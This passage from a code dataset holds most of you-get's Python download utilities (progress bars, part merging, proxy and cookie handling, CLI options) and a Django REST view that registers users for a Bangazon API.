Retry request\n tmp_headers['Range'] = 'bytes=' + str(received - chunk_start) + '-'\n response = urlopen_with_retry(\n request.Request(url, headers=tmp_headers)\n )\n continue\n output.write(buffer)\n received += len(buffer)\n received_chunk += len(buffer)\n if bar:\n bar.update_received(len(buffer))\n\n assert received == os.path.getsize(temp_filepath), '%s == %s == %s' % (\n received, os.path.getsize(temp_filepath), temp_filepath\n )\n\n if os.access(filepath, os.W_OK):\n # on Windows rename could fail if destination filepath exists\n os.remove(filepath)\n os.rename(temp_filepath, filepath)\n\n\nclass SimpleProgressBar:\n term_size = term.get_terminal_size()[1]\n\n def __init__(self, total_size, total_pieces=1):\n self.displayed = False\n self.total_size = total_size\n self.total_pieces = total_pieces\n self.current_piece = 1\n self.received = 0\n self.speed = ''\n self.last_updated = time.time()\n\n total_pieces_len = len(str(total_pieces))\n # 38 is the size of all statically known size in self.bar\n total_str = '%5s' % round(self.total_size / 1048576, 1)\n total_str_width = max(len(total_str), 5)\n self.bar_size = self.term_size - 28 - 2 * total_pieces_len \\\n - 2 * total_str_width\n self.bar = '{:>4}%% ({:>%s}/%sMB) ├{:─<%s}┤[{:>%s}/{:>%s}] {}' % (\n total_str_width, total_str, self.bar_size, total_pieces_len,\n total_pieces_len\n )\n\n def update(self):\n self.displayed = True\n bar_size = self.bar_size\n percent = round(self.received * 100 / self.total_size, 1)\n if percent >= 100:\n percent = 100\n dots = bar_size * int(percent) // 100\n plus = int(percent) - dots // bar_size * 100\n if plus > 0.8:\n plus = '█'\n elif plus > 0.4:\n plus = '>'\n else:\n plus = ''\n bar = '█' * dots + plus\n bar = self.bar.format(\n percent, round(self.received / 1048576, 1), bar,\n self.current_piece, self.total_pieces, self.speed\n )\n sys.stdout.write('\\r' + bar)\n sys.stdout.flush()\n\n def update_received(self, n):\n self.received += n\n time_diff = time.time() - self.last_updated\n bytes_ps = n / time_diff if time_diff else 0\n if bytes_ps >= 1024 ** 3:\n self.speed = '{:4.0f} GB/s'.format(bytes_ps / 1024 ** 3)\n elif bytes_ps >= 1024 ** 2:\n self.speed = '{:4.0f} MB/s'.format(bytes_ps / 1024 ** 2)\n elif bytes_ps >= 1024:\n self.speed = '{:4.0f} kB/s'.format(bytes_ps / 1024)\n else:\n self.speed = '{:4.0f} B/s'.format(bytes_ps)\n self.last_updated = time.time()\n self.update()\n\n def update_piece(self, n):\n self.current_piece = n\n\n def done(self):\n if self.displayed:\n print()\n self.displayed = False\n\n\nclass PiecesProgressBar:\n def __init__(self, total_size, total_pieces=1):\n self.displayed = False\n self.total_size = total_size\n self.total_pieces = total_pieces\n self.current_piece = 1\n self.received = 0\n\n def update(self):\n self.displayed = True\n bar = '{0:>5}%[{1:<40}] {2}/{3}'.format(\n '', '=' * 40, self.current_piece, self.total_pieces\n )\n sys.stdout.write('\\r' + bar)\n sys.stdout.flush()\n\n def update_received(self, n):\n self.received += n\n self.update()\n\n def update_piece(self, n):\n self.current_piece = n\n\n def done(self):\n if self.displayed:\n print()\n self.displayed = False\n\n\nclass DummyProgressBar:\n def __init__(self, *args):\n pass\n\n def update_received(self, n):\n pass\n\n def update_piece(self, n):\n pass\n\n def done(self):\n pass\n\n\ndef get_output_filename(urls, title, ext, output_dir, merge, **kwargs):\n # lame hack for the --output-filename option\n global output_filename\n if output_filename:\n result = output_filename\n if 
kwargs.get('part', -1) >= 0:\n result = '%s[%02d]' % (result, kwargs.get('part'))\n if ext:\n result = '%s.%s' % (result, ext)\n return result\n\n merged_ext = ext\n if (len(urls) > 1) and merge:\n from .processor.ffmpeg import has_ffmpeg_installed\n if ext in ['flv', 'f4v']:\n if has_ffmpeg_installed():\n merged_ext = 'mp4'\n else:\n merged_ext = 'flv'\n elif ext == 'mp4':\n merged_ext = 'mp4'\n elif ext == 'ts':\n if has_ffmpeg_installed():\n merged_ext = 'mkv'\n else:\n merged_ext = 'ts'\n result = title\n if kwargs.get('part', -1) >= 0:\n result = '%s[%02d]' % (result, kwargs.get('part'))\n result = '%s.%s' % (result, merged_ext)\n return result.replace(\"'\", \"_\")\n\ndef print_user_agent(faker=False):\n urllib_default_user_agent = 'Python-urllib/%d.%d' % sys.version_info[:2]\n user_agent = fake_headers['User-Agent'] if faker else urllib_default_user_agent\n print('User Agent: %s' % user_agent)\n\ndef download_urls(\n urls, title, ext, total_size, output_dir='.', refer=None, merge=True,\n faker=False, headers={}, **kwargs\n):\n assert urls\n if json_output:\n json_output_.download_urls(\n urls=urls, title=title, ext=ext, total_size=total_size,\n refer=refer\n )\n return\n if dry_run:\n print_user_agent(faker=faker)\n try:\n print('Real URLs:\\n%s' % '\\n'.join(urls))\n except:\n print('Real URLs:\\n%s' % '\\n'.join([j for i in urls for j in i]))\n return\n\n if player:\n launch_player(player, urls)\n return\n\n if not total_size:\n try:\n total_size = urls_size(urls, faker=faker, headers=headers)\n except:\n import traceback\n traceback.print_exc(file=sys.stdout)\n pass\n\n title = tr(get_filename(title))\n if postfix and 'vid' in kwargs:\n title = \"%s [%s]\" % (title, kwargs['vid'])\n if prefix is not None:\n title = \"[%s] %s\" % (prefix, title)\n output_filename = get_output_filename(urls, title, ext, output_dir, merge)\n output_filepath = os.path.join(output_dir, output_filename)\n\n if total_size:\n if not force and os.path.exists(output_filepath) and not auto_rename\\\n and (os.path.getsize(output_filepath) >= total_size * 0.9\\\n or skip_existing_file_size_check):\n if skip_existing_file_size_check:\n log.w('Skipping %s without checking size: file already exists' % output_filepath)\n else:\n log.w('Skipping %s: file already exists' % output_filepath)\n print()\n return\n bar = SimpleProgressBar(total_size, len(urls))\n else:\n bar = PiecesProgressBar(total_size, len(urls))\n\n if len(urls) == 1:\n url = urls[0]\n print('Downloading %s ...' % tr(output_filename))\n bar.update()\n url_save(\n url, output_filepath, bar, refer=refer, faker=faker,\n headers=headers, **kwargs\n )\n bar.done()\n else:\n parts = []\n print('Downloading %s ...' % tr(output_filename))\n bar.update()\n for i, url in enumerate(urls):\n output_filename_i = get_output_filename(urls, title, ext, output_dir, merge, part=i)\n output_filepath_i = os.path.join(output_dir, output_filename_i)\n parts.append(output_filepath_i)\n # print 'Downloading %s [%s/%s]...' 
% (tr(filename), i + 1, len(urls))\n bar.update_piece(i + 1)\n url_save(\n url, output_filepath_i, bar, refer=refer, is_part=True, faker=faker,\n headers=headers, **kwargs\n )\n bar.done()\n\n if not merge:\n print()\n return\n\n if 'av' in kwargs and kwargs['av']:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_av\n ret = ffmpeg_concat_av(parts, output_filepath, ext)\n print('Merged into %s' % output_filename)\n if ret == 0:\n for part in parts:\n os.remove(part)\n\n elif ext in ['flv', 'f4v']:\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_flv_to_mp4\n ffmpeg_concat_flv_to_mp4(parts, output_filepath)\n else:\n from .processor.join_flv import concat_flv\n concat_flv(parts, output_filepath)\n print('Merged into %s' % output_filename)\n except:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n elif ext == 'mp4':\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_mp4_to_mp4\n ffmpeg_concat_mp4_to_mp4(parts, output_filepath)\n else:\n from .processor.join_mp4 import concat_mp4\n concat_mp4(parts, output_filepath)\n print('Merged into %s' % output_filename)\n except:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n elif ext == 'ts':\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n if has_ffmpeg_installed():\n from .processor.ffmpeg import ffmpeg_concat_ts_to_mkv\n ffmpeg_concat_ts_to_mkv(parts, output_filepath)\n else:\n from .processor.join_ts import concat_ts\n concat_ts(parts, output_filepath)\n print('Merged into %s' % output_filename)\n except:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n elif ext == 'mp3':\n try:\n from .processor.ffmpeg import has_ffmpeg_installed\n\n assert has_ffmpeg_installed()\n from .processor.ffmpeg import ffmpeg_concat_mp3_to_mp3\n ffmpeg_concat_mp3_to_mp3(parts, output_filepath)\n print('Merged into %s' % output_filename)\n except:\n raise\n else:\n for part in parts:\n os.remove(part)\n\n else:\n print(\"Can't merge %s files\" % ext)\n\n print()\n\n\ndef download_rtmp_url(\n url, title, ext, params={}, total_size=0, output_dir='.', refer=None,\n merge=True, faker=False\n):\n assert url\n if dry_run:\n print_user_agent(faker=faker)\n print('Real URL:\\n%s\\n' % [url])\n if params.get('-y', False): # None or unset -> False\n print('Real Playpath:\\n%s\\n' % [params.get('-y')])\n return\n\n if player:\n from .processor.rtmpdump import play_rtmpdump_stream\n play_rtmpdump_stream(player, url, params)\n return\n\n from .processor.rtmpdump import (\n has_rtmpdump_installed, download_rtmpdump_stream\n )\n assert has_rtmpdump_installed(), 'RTMPDump not installed.'\n download_rtmpdump_stream(url, title, ext, params, output_dir)\n\n\ndef download_url_ffmpeg(\n url, title, ext, params={}, total_size=0, output_dir='.', refer=None,\n merge=True, faker=False, stream=True\n):\n assert url\n if dry_run:\n print_user_agent(faker=faker)\n print('Real URL:\\n%s\\n' % [url])\n if params.get('-y', False): # None or unset ->False\n print('Real Playpath:\\n%s\\n' % [params.get('-y')])\n return\n\n if player:\n launch_player(player, [url])\n return\n\n from .processor.ffmpeg import has_ffmpeg_installed, ffmpeg_download_stream\n assert has_ffmpeg_installed(), 'FFmpeg not installed.'\n\n global output_filename\n if output_filename:\n dotPos = output_filename.rfind('.')\n if dotPos > 0:\n title = 
output_filename[:dotPos]\n ext = output_filename[dotPos+1:]\n else:\n title = output_filename\n\n title = tr(get_filename(title))\n\n ffmpeg_download_stream(url, title, ext, params, output_dir, stream=stream)\n\n\ndef playlist_not_supported(name):\n def f(*args, **kwargs):\n raise NotImplementedError('Playlist is not supported for ' + name)\n return f\n\n\ndef print_info(site_info, title, type, size, **kwargs):\n if json_output:\n json_output_.print_info(\n site_info=site_info, title=title, type=type, size=size\n )\n return\n if type:\n type = type.lower()\n if type in ['3gp']:\n type = 'video/3gpp'\n elif type in ['asf', 'wmv']:\n type = 'video/x-ms-asf'\n elif type in ['flv', 'f4v']:\n type = 'video/x-flv'\n elif type in ['mkv']:\n type = 'video/x-matroska'\n elif type in ['mp3']:\n type = 'audio/mpeg'\n elif type in ['mp4']:\n type = 'video/mp4'\n elif type in ['mov']:\n type = 'video/quicktime'\n elif type in ['ts']:\n type = 'video/MP2T'\n elif type in ['webm']:\n type = 'video/webm'\n\n elif type in ['jpg']:\n type = 'image/jpeg'\n elif type in ['png']:\n type = 'image/png'\n elif type in ['gif']:\n type = 'image/gif'\n\n if type in ['video/3gpp']:\n type_info = '3GPP multimedia file (%s)' % type\n elif type in ['video/x-flv', 'video/f4v']:\n type_info = 'Flash video (%s)' % type\n elif type in ['video/mp4', 'video/x-m4v']:\n type_info = 'MPEG-4 video (%s)' % type\n elif type in ['video/MP2T']:\n type_info = 'MPEG-2 transport stream (%s)' % type\n elif type in ['video/webm']:\n type_info = 'WebM video (%s)' % type\n # elif type in ['video/ogg']:\n # type_info = 'Ogg video (%s)' % type\n elif type in ['video/quicktime']:\n type_info = 'QuickTime video (%s)' % type\n elif type in ['video/x-matroska']:\n type_info = 'Matroska video (%s)' % type\n # elif type in ['video/x-ms-wmv']:\n # type_info = 'Windows Media video (%s)' % type\n elif type in ['video/x-ms-asf']:\n type_info = 'Advanced Systems Format (%s)' % type\n # elif type in ['video/mpeg']:\n # type_info = 'MPEG video (%s)' % type\n elif type in ['audio/mp4', 'audio/m4a']:\n type_info = 'MPEG-4 audio (%s)' % type\n elif type in ['audio/mpeg']:\n type_info = 'MP3 (%s)' % type\n elif type in ['audio/wav', 'audio/wave', 'audio/x-wav']:\n type_info = 'Waveform Audio File Format ({})'.format(type)\n\n elif type in ['image/jpeg']:\n type_info = 'JPEG Image (%s)' % type\n elif type in ['image/png']:\n type_info = 'Portable Network Graphics (%s)' % type\n elif type in ['image/gif']:\n type_info = 'Graphics Interchange Format (%s)' % type\n elif type in ['m3u8']:\n if 'm3u8_type' in kwargs:\n if kwargs['m3u8_type'] == 'master':\n type_info = 'M3U8 Master {}'.format(type)\n else:\n type_info = 'M3U8 Playlist {}'.format(type)\n else:\n type_info = 'Unknown type (%s)' % type\n\n maybe_print('Site: ', site_info)\n maybe_print('Title: ', unescape_html(tr(title)))\n print('Type: ', type_info)\n if type != 'm3u8':\n print(\n 'Size: ', round(size / 1048576, 2),\n 'MiB (' + str(size) + ' Bytes)'\n )\n if type == 'm3u8' and 'm3u8_url' in kwargs:\n print('M3U8 Url: {}'.format(kwargs['m3u8_url']))\n print()\n\n\ndef mime_to_container(mime):\n mapping = {\n 'video/3gpp': '3gp',\n 'video/mp4': 'mp4',\n 'video/webm': 'webm',\n 'video/x-flv': 'flv',\n }\n if mime in mapping:\n return mapping[mime]\n else:\n return mime.split('/')[1]\n\n\ndef parse_host(host):\n \"\"\"Parses host name and port number from a string.\n \"\"\"\n if re.match(r'^(\\d+)$', host) is not None:\n return (\"0.0.0.0\", int(host))\n if re.match(r'^(\\w+)://', host) is None:\n host = 
\"//\" + host\n o = parse.urlparse(host)\n hostname = o.hostname or \"0.0.0.0\"\n port = o.port or 0\n return (hostname, port)\n\n\ndef set_proxy(proxy):\n proxy_handler = request.ProxyHandler({\n 'http': '%s:%s' % proxy,\n 'https': '%s:%s' % proxy,\n })\n opener = request.build_opener(proxy_handler)\n request.install_opener(opener)\n\n\ndef unset_proxy():\n proxy_handler = request.ProxyHandler({})\n opener = request.build_opener(proxy_handler)\n request.install_opener(opener)\n\n\n# DEPRECATED in favor of set_proxy() and unset_proxy()\ndef set_http_proxy(proxy):\n if proxy is None: # Use system default setting\n proxy_support = request.ProxyHandler()\n elif proxy == '': # Don't use any proxy\n proxy_support = request.ProxyHandler({})\n else: # Use proxy\n proxy_support = request.ProxyHandler(\n {'http': '%s' % proxy, 'https': '%s' % proxy}\n )\n opener = request.build_opener(proxy_support)\n request.install_opener(opener)\n\n\ndef print_more_compatible(*args, **kwargs):\n import builtins as __builtin__\n \"\"\"Overload default print function as py (<3.3) does not support 'flush' keyword.\n Although the function name can be same as print to get itself overloaded automatically,\n I'd rather leave it with a different name and only overload it when importing to make less confusion.\n \"\"\"\n # nothing happens on py3.3 and later\n if sys.version_info[:2] >= (3, 3):\n return __builtin__.print(*args, **kwargs)\n\n # in lower pyver (e.g. 3.2.x), remove 'flush' keyword and flush it as requested\n doFlush = kwargs.pop('flush', False)\n ret = __builtin__.print(*args, **kwargs)\n if doFlush:\n kwargs.get('file', sys.stdout).flush()\n return ret\n\n\ndef download_main(download, download_playlist, urls, playlist, **kwargs):\n for url in urls:\n if re.match(r'https?://', url) is None:\n url = 'http://' + url\n\n if m3u8:\n if output_filename:\n title = output_filename\n else:\n title = \"m3u8file\"\n download_url_ffmpeg(url=url, title=title,ext = 'mp4',output_dir = '.')\n elif playlist:\n download_playlist(url, **kwargs)\n else:\n download(url, **kwargs)\n\n\ndef load_cookies(cookiefile):\n global cookies\n if cookiefile.endswith('.txt'):\n # MozillaCookieJar treats prefix '#HttpOnly_' as comments incorrectly!\n # do not use its load()\n # see also:\n # - https://docs.python.org/3/library/http.cookiejar.html#http.cookiejar.MozillaCookieJar\n # - https://github.com/python/cpython/blob/4b219ce/Lib/http/cookiejar.py#L2014\n # - https://curl.haxx.se/libcurl/c/CURLOPT_COOKIELIST.html#EXAMPLE\n #cookies = cookiejar.MozillaCookieJar(cookiefile)\n #cookies.load()\n from http.cookiejar import Cookie\n cookies = cookiejar.MozillaCookieJar()\n now = time.time()\n ignore_discard, ignore_expires = False, False\n with open(cookiefile, 'r', encoding='utf-8') as f:\n for line in f:\n # last field may be absent, so keep any trailing tab\n if line.endswith(\"\\n\"): line = line[:-1]\n\n # skip comments and blank lines XXX what is $ for?\n if (line.strip().startswith((\"#\", \"$\")) or\n line.strip() == \"\"):\n if not line.strip().startswith('#HttpOnly_'): # skip for #HttpOnly_\n continue\n\n domain, domain_specified, path, secure, expires, name, value = \\\n line.split(\"\\t\")\n secure = (secure == \"TRUE\")\n domain_specified = (domain_specified == \"TRUE\")\n if name == \"\":\n # cookies.txt regards 'Set-Cookie: foo' as a cookie\n # with no name, whereas http.cookiejar regards it as a\n # cookie with no value.\n name = value\n value = None\n\n initial_dot = domain.startswith(\".\")\n if not 
line.strip().startswith('#HttpOnly_'): # skip for #HttpOnly_\n assert domain_specified == initial_dot\n\n discard = False\n if expires == \"\":\n expires = None\n discard = True\n\n # assume path_specified is false\n c = Cookie(0, name, value,\n None, False,\n domain, domain_specified, initial_dot,\n path, False,\n secure,\n expires,\n discard,\n None,\n None,\n {})\n if not ignore_discard and c.discard:\n continue\n if not ignore_expires and c.is_expired(now):\n continue\n cookies.set_cookie(c)\n\n elif cookiefile.endswith(('.sqlite', '.sqlite3')):\n import sqlite3, shutil, tempfile\n temp_dir = tempfile.gettempdir()\n temp_cookiefile = os.path.join(temp_dir, 'temp_cookiefile.sqlite')\n shutil.copy2(cookiefile, temp_cookiefile)\n\n cookies = cookiejar.MozillaCookieJar()\n con = sqlite3.connect(temp_cookiefile)\n cur = con.cursor()\n cur.execute(\"\"\"SELECT host, path, isSecure, expiry, name, value\n FROM moz_cookies\"\"\")\n for item in cur.fetchall():\n c = cookiejar.Cookie(\n 0, item[4], item[5], None, False, item[0],\n item[0].startswith('.'), item[0].startswith('.'),\n item[1], False, item[2], item[3], item[3] == '', None,\n None, {},\n )\n cookies.set_cookie(c)\n\n else:\n log.e('[error] unsupported cookies format')\n # TODO: Chromium Cookies\n # SELECT host_key, path, secure, expires_utc, name, encrypted_value\n # FROM cookies\n # http://n8henrie.com/2013/11/use-chromes-cookies-for-easier-downloading-with-python-requests/\n\n\ndef set_socks_proxy(proxy):\n try:\n import socks\n if '@' in proxy:\n proxy_info = proxy.split(\"@\")\n socks_proxy_addrs = proxy_info[1].split(':')\n socks_proxy_auth = proxy_info[0].split(\":\")\n socks.set_default_proxy(\n socks.SOCKS5,\n socks_proxy_addrs[0],\n int(socks_proxy_addrs[1]),\n True,\n socks_proxy_auth[0],\n socks_proxy_auth[1]\n )\n else:\n socks_proxy_addrs = proxy.split(':')\n socks.set_default_proxy(\n socks.SOCKS5,\n socks_proxy_addrs[0],\n int(socks_proxy_addrs[1]),\n )\n socket.socket = socks.socksocket\n\n def getaddrinfo(*args):\n return [\n (socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))\n ]\n socket.getaddrinfo = getaddrinfo\n except ImportError:\n log.w(\n 'Error importing PySocks library, socks proxy ignored.'\n 'In order to use use socks proxy, please install PySocks.'\n )\n\n\ndef script_main(download, download_playlist, **kwargs):\n logging.basicConfig(format='[%(levelname)s] %(message)s')\n\n def print_version():\n version = get_version(\n kwargs['repo_path'] if 'repo_path' in kwargs else __version__\n )\n log.i(\n 'version {}, a tiny downloader that scrapes the web.'.format(\n version\n )\n )\n\n parser = argparse.ArgumentParser(\n prog='you-get',\n usage='you-get [OPTION]... 
URL...',\n description='A tiny downloader that scrapes the web',\n add_help=False,\n )\n parser.add_argument(\n '-V', '--version', action='store_true',\n help='Print version and exit'\n )\n parser.add_argument(\n '-h', '--help', action='store_true',\n help='Print this help message and exit'\n )\n\n dry_run_grp = parser.add_argument_group(\n 'Dry-run options', '(no actual downloading)'\n )\n dry_run_grp = dry_run_grp.add_mutually_exclusive_group()\n dry_run_grp.add_argument(\n '-i', '--info', action='store_true', help='Print extracted information'\n )\n dry_run_grp.add_argument(\n '-u', '--url', action='store_true',\n help='Print extracted information with URLs'\n )\n dry_run_grp.add_argument(\n '--json', action='store_true',\n help='Print extracted URLs in JSON format'\n )\n\n download_grp = parser.add_argument_group('Download options')\n download_grp.add_argument(\n '-n', '--no-merge', action='store_true', default=False,\n help='Do not merge video parts'\n )\n download_grp.add_argument(\n '--no-caption', action='store_true',\n help='Do not download captions (subtitles, lyrics, danmaku, ...)'\n )\n download_grp.add_argument(\n '--post', '--postfix', dest='postfix', action='store_true', default=False,\n help='Postfix downloaded files with unique identifiers'\n )\n download_grp.add_argument(\n '--pre', '--prefix', dest='prefix', metavar='PREFIX', default=None,\n help='Prefix downloaded files with string'\n )\n download_grp.add_argument(\n '-f', '--force', action='store_true', default=False,\n help='Force overwriting existing files'\n )\n download_grp.add_argument(\n '--skip-existing-file-size-check', action='store_true', default=False,\n help='Skip existing file without checking file size'\n )\n download_grp.add_argument(\n '-F', '--format', metavar='STREAM_ID',\n help='Set video format to STREAM_ID'\n )\n download_grp.add_argument(\n '-O', '--output-filename', metavar='FILE', help='Set output filename'\n )\n download_grp.add_argument(\n '-o', '--output-dir', metavar='DIR', default='.',\n help='Set output directory'\n )\n download_grp.add_argument(\n '-p', '--player', metavar='PLAYER',\n help='Stream extracted URL to a PLAYER'\n )\n download_grp.add_argument(\n '-c', '--cookies', metavar='COOKIES_FILE',\n help='Load cookies.txt or cookies.sqlite'\n )\n download_grp.add_argument(\n '-t', '--timeout', metavar='SECONDS', type=int, default=600,\n help='Set socket timeout'\n )\n download_grp.add_argument(\n '-d', '--debug', action='store_true',\n help='Show traceback and other debug info'\n )\n download_grp.add_argument(\n '-I', '--input-file', metavar='FILE', type=argparse.FileType('r'),\n help='Read non-playlist URLs from FILE'\n )\n download_grp.add_argument(\n '-P', '--password', help='Set video visit password to PASSWORD'\n )\n download_grp.add_argument(\n '-l', '--playlist', action='store_true',\n help='Prefer to download a playlist'\n )\n\n playlist_grp = parser.add_argument_group('Playlist optional options')\n playlist_grp.add_argument(\n '--first', metavar='FIRST',\n help='the first number'\n )\n playlist_grp.add_argument(\n '--last', metavar='LAST',\n help='the last number'\n )\n playlist_grp.add_argument(\n '--size', '--page-size', metavar='PAGE_SIZE',\n help='the page size number'\n )\n\n download_grp.add_argument(\n '-a', '--auto-rename', action='store_true', default=False,\n help='Auto rename same name different files'\n )\n\n download_grp.add_argument(\n '-k', '--insecure', action='store_true', default=False,\n help='ignore ssl errors'\n )\n\n proxy_grp = 
parser.add_argument_group('Proxy options')\n proxy_grp = proxy_grp.add_mutually_exclusive_group()\n proxy_grp.add_argument(\n '-x', '--http-proxy', metavar='HOST:PORT',\n help='Use an HTTP proxy for downloading'\n )\n proxy_grp.add_argument(\n '-y', '--extractor-proxy', metavar='HOST:PORT',\n help='Use an HTTP proxy for extracting only'\n )\n proxy_grp.add_argument(\n '--no-proxy', action='store_true', help='Never use a proxy'\n )\n proxy_grp.add_argument(\n '-s', '--socks-proxy', metavar='HOST:PORT or USERNAME:PASSWORD@HOST:PORT',\n help='Use an SOCKS5 proxy for downloading'\n )\n\n download_grp.add_argument('--stream', help=argparse.SUPPRESS)\n download_grp.add_argument('--itag', help=argparse.SUPPRESS)\n\n download_grp.add_argument('-m', '--m3u8', action='store_true', default=False,\n help = 'download video using an m3u8 url')\n\n\n parser.add_argument('URL', nargs='*', help=argparse.SUPPRESS)\n\n args = parser.parse_args()\n\n if args.help:\n print_version()\n parser.print_help()\n sys.exit()\n if args.version:\n print_version()\n sys.exit()\n\n if args.debug:\n # Set level of root logger to DEBUG\n logging.getLogger().setLevel(logging.DEBUG)\n\n global force\n global skip_existing_file_size_check\n global dry_run\n global json_output\n global player\n global extractor_proxy\n global output_filename\n global auto_rename\n global insecure\n global m3u8\n global postfix\n global prefix\n output_filename = args.output_filename\n extractor_proxy = args.extractor_proxy\n\n info_only = args.info\n if args.force:\n force = True\n if args.skip_existing_file_size_check:\n skip_existing_file_size_check = True\n if args.auto_rename:\n auto_rename = True\n if args.url:\n dry_run = True\n if args.json:\n json_output = True\n # to fix extractors not use VideoExtractor\n dry_run = True\n info_only = False\n\n if args.cookies:\n load_cookies(args.cookies)\n\n if args.m3u8:\n m3u8 = True\n\n caption = True\n stream_id = args.format or args.stream or args.itag\n if args.no_caption:\n caption = False\n if args.player:\n player = args.player\n caption = False\n\n if args.insecure:\n # ignore ssl\n insecure = True\n\n postfix = args.postfix\n prefix = args.prefix\n\n if args.no_proxy:\n set_http_proxy('')\n else:\n set_http_proxy(args.http_proxy)\n if args.socks_proxy:\n set_socks_proxy(args.socks_proxy)\n\n URLs = []\n if args.input_file:\n logging.debug('you are trying to load urls from %s', args.input_file)\n if args.playlist:\n log.e(\n \"reading playlist from a file is unsupported \"\n \"and won't make your life easier\"\n )\n sys.exit(2)\n URLs.extend(args.input_file.read().splitlines())\n args.input_file.close()\n URLs.extend(args.URL)\n\n if not URLs:\n parser.print_help()\n sys.exit()\n\n socket.setdefaulttimeout(args.timeout)\n\n try:\n extra = {'args': args}\n if extractor_proxy:\n extra['extractor_proxy'] = extractor_proxy\n if stream_id:\n extra['stream_id'] = stream_id\n download_main(\n download, download_playlist,\n URLs, args.playlist,\n output_dir=args.output_dir, merge=not args.no_merge,\n info_only=info_only, json_output=json_output, caption=caption,\n password=args.password,\n **extra\n )\n except KeyboardInterrupt:\n if args.debug:\n raise\n else:\n sys.exit(1)\n except UnicodeEncodeError:\n if args.debug:\n raise\n log.e(\n '[error] oops, the current environment does not seem to support '\n 'Unicode.'\n )\n log.e('please set it to a UTF-8-aware locale first,')\n log.e(\n 'so as to save the video (with some Unicode characters) correctly.'\n )\n log.e('you can do it like this:')\n 
log.e(' (Windows) % chcp 65001 ')\n log.e(' (Linux) $ LC_CTYPE=en_US.UTF-8')\n sys.exit(1)\n except Exception:\n if not args.debug:\n log.e('[error] oops, something went wrong.')\n log.e(\n 'don\\'t panic, c\\'est la vie. please try the following steps:'\n )\n log.e(' (1) Rule out any network problem.')\n log.e(' (2) Make sure you-get is up-to-date.')\n log.e(' (3) Check if the issue is already known, on')\n log.e(' https://github.com/soimort/you-get/wiki/Known-Bugs')\n log.e(' https://github.com/soimort/you-get/issues')\n log.e(' (4) Run the command with \\'--debug\\' option,')\n log.e(' and report this issue with the full output.')\n else:\n print_version()\n log.i(args)\n raise\n sys.exit(1)\n\n\ndef google_search(url):\n keywords = r1(r'https?://(.*)', url)\n url = 'https://www.google.com/search?tbm=vid&q=%s' % parse.quote(keywords)\n page = get_content(url, headers=fake_headers)\n videos = re.findall(\n r'(https://www\\.youtube\\.com/watch\\?v=[\\w-]+)', page\n )\n print('Best matched result:')\n return(videos[0])\n\n\ndef url_to_module(url):\n try:\n video_host = r1(r'https?://([^/]+)/', url)\n video_url = r1(r'https?://[^/]+(.*)', url)\n assert video_host and video_url\n except AssertionError:\n url = google_search(url)\n video_host = r1(r'https?://([^/]+)/', url)\n video_url = r1(r'https?://[^/]+(.*)', url)\n\n if video_host.endswith('.com.cn') or video_host.endswith('.ac.cn'):\n video_host = video_host[:-3]\n domain = r1(r'(\\.[^.]+\\.[^.]+)$', video_host) or video_host\n assert domain, 'unsupported url: ' + url\n\n # all non-ASCII code points must be quoted (percent-encoded UTF-8)\n url = ''.join([ch if ord(ch) in range(128) else parse.quote(ch) for ch in url])\n video_host = r1(r'https?://([^/]+)/', url)\n video_url = r1(r'https?://[^/]+(.*)', url)\n\n k = r1(r'([^.]+)', domain)\n if k in SITES:\n return (\n import_module('.'.join(['you_get', 'extractors', SITES[k]])),\n url\n )\n else:\n try:\n location = get_location(url) # t.co isn't happy with fake_headers\n except:\n location = get_location(url, headers=fake_headers)\n\n if location and location != url and not location.startswith('/'):\n return url_to_module(location)\n else:\n return import_module('you_get.extractors.universal'), url\n\n\ndef any_download(url, **kwargs):\n m, url = url_to_module(url)\n m.download(url, **kwargs)\n\n\ndef any_download_playlist(url, **kwargs):\n m, url = url_to_module(url)\n m.download_playlist(url, **kwargs)\n\n\ndef main(**kwargs):\n script_main(any_download, any_download_playlist, **kwargs)\n","repo_name":"soimort/you-get","sub_path":"src/you_get/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":60789,"program_lang":"python","lang":"en","doc_type":"code","stars":48481,"dataset":"github-code","pt":"32"} +{"seq_id":"8858767876","text":"from django.contrib.auth.models import User\nfrom rest_framework import generics\nfrom rest_framework.permissions import IsAuthenticated, AllowAny\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import logout, login, authenticate\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nimport json\nfrom api import models\n\n\n\n\nclass RegisterView(generics.RetrieveAPIView):\n permission_classes = (AllowAny,)\n\n error_messages = {\n 'invalid': 'Please enter a valid username or password',\n 'disabled': 'Sorry, account suspended'\n }\n\n def _error_response(self, message_key):\n data = json.dumps({\n 'success': False,\n 'message': self.error_messages[message_key],\n 'user_id': None,\n })\n\n 
        return data\n\n    
@csrf_exempt\n def post(self, request):\n permission_classes = (AllowAny,)\n \"\"\"\n Purpose: Register a user\n Author: @rtwhitfield84\n \"\"\"\n\n # data = request.POST\n req_body = json.loads(request.body.decode())\n new_user = User.objects.create_user(\n username=req_body['username'],\n email=req_body['email'],\n password=req_body['password'],\n first_name=req_body['first_name'],\n last_name=req_body['last_name'],\n )\n # new_user = authenticate(username=new_user['username'], password=new_user['password'])\n models.Customer.objects.create(\n user=new_user,\n street_address=req_body['street_address'],\n city=req_body['city'],\n state=req_body['state'],\n zip_code=req_body['zip_code']\n )\n success = False\n if new_user is not None:\n if new_user.is_active:\n login(request, new_user)\n data = json.dumps({\n 'success': True,\n 'username': new_user.username,\n 'email': new_user.email,\n })\n return HttpResponse(data, content_type='application/json')\n\n return HttpResponse(self._error_response('disabled'), content_type='application/json')\n return HttpResponse(self._error_response('invalid'), content_type='application/json')","repo_name":"Karma-Khameleons/bangazon_api","sub_path":"bangazon/api/views/register_view.py","file_name":"register_view.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39652631543","text":"import 